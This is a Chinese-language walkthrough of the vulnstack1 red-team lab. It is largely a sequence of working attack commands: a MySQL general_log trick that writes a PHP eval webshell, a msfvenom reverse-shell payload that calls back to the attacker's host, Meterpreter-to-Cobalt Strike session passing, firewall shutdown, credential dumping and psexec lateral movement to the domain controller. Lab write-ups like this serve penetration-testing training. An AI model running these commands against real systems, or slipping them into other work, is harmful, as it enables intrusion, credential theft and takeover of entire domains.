vulnstack1--红队靶机

vulnstack1–红队靶机

借鉴网址:https://blog.csdn.net/qq_46527080/article/details/112648202

vulnstack1--红队靶机

思路流程:

环境搭建(靶机环境)
一、前渗透的阶段
首先信息收集
getshell
尝试内网信息收集
二、后渗透阶段
(一)msf和cs联动
内网信息收集
三、攻击域(内网渗透)
(一)提权
(二)横向移动
攻击域控

流程

前渗透

1、arp-scan -l 扫IP
2、nmap -sV -p- 靶机IP 扫端口,发现开放端口有80和3306
3、80端口浏览器访问,发现是一个phpStudy探针
4、网页下面有一个登录框,弱口令 root root 试试,发现登录成功
5、dirb 靶机IP目录遍历一下,发现一个phpmyadmin的后台,我们访问一下,用刚才的弱口令登录上
6、登录之后,利用日志写入一句话木马,开启mysql日志功能:(按顺序写下面四句话)

show global variables like '%general%'
set global general_log='ON'

之后
将日志文件的存放位置修改为当前网站的根目录:(根目录是刚才php探针保存的)

set global  general_log_file = 'C:/phpStudy/WWW/xy.php'

写入一句话

SELECT '<?php @eval($_POST["xy"]); ?>'

7、我们访问一下:靶机IP/xy.php 我们的木马
用蚁剑进行连接,连接成功

后渗透

8、首先查看一下kali IP地址
9、msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali IP LPORT=6666 -f exe -o xy.exe
10、赋予权限:chmod 777 xy.exe
11、xy.exe文件上传到蚁剑
12、

use exploit/multi/handler     //首先进入这个模块
set payload windows/meterpreter/reverse_tcp     //(上一个payload有问题,我们用这个)
set lhost kali IP       //设置kali的地址
set lport 6666                //设置监听的端口

13、蚁剑终端输入:xy.exe
14、kali中 run
15、开启远程桌面 run getgui -e (简单的方法)发现成功开启
我们连接一下试试
16、主机:mstsc
17、kal中: background(退出)
18、首先在cs中开启终端 :./teamserver kali IP 密码
19、cs中连接 kali IP
20、发现连接成功,然后再进行,创建一个监听,IP还是kali ip 端口号为 7777
21、

废:然后再从msf操作设置payload进行反弹
废:首先退出上一个会话
废:background
然后进入另一个模块
use exploit/windows/local/payload_inject
进入之后设置payload
set payload windows/meterpreter/reverse_http    //设置http的payload
set DisablePayloadHandler true   //payload_inject执行之后会在本地产生一个新的handler,设置为true表示不重复生成
set lhost kali IP           //公网的ip(搭建CS那个主机ip)
set lport 7777              //监听的端口
set session 1               //设置会话id

CS中查看,发现弹回来了
beacon中 看主机名:shell hostname
查看用户列表:shell net users

攻击域(内网渗透)

一:提权
1.首先进行利用漏洞提权
2.如果提权成功,会发现成功上线一台system权限的主机
可以看到返回的信息内容如下:
vulnstack1--红队靶机
二:横向移动
1.首先将防火墙关闭
查看防火墙的状态
shell netsh firewall show state
关闭防火墙的命令
shell netsh advfirewall set allprofiles state off
2.常规信息收集
(1)当前域内计算机列表:
1.net view
三台主机信息(三台主机信息前提是提权到system权限)
点击目标进行列出
发现已经成功列出
等一会我们再结合3步骤获取的明文密码可以让整个win7域用户进行上线
(2)域控列表:
查看用户列表
net user
3.抓取凭证hash
首先抓取dumphash的hex密码
获取明文
获取凭证信息
由于环境问题我们实验没成功
可能是因为我们进行创建后门
攻击域控
1.首先创建一个smb监听器
结合上面文档我们再进行做一遍
发现创建成功
2.横向psexec拿下域控
用户名密码选择带域控的
监听器选择smb
会话选择以上我们做的任意一个
我们点击开始,发现成上线域控
由于我们做了两遍,所以他上线的比较多
3.拿下域成员
同样的方法
这次会话选择我们后上线的域控
发现全部上线成功
这个域已经全部沦陷

上一篇:ctfshow 命令执行


下一篇:Cobalt Strike 报错 “*** qwk hosted Scripted Web Delivery (powershell) @ http://192.168.54.129:80/a”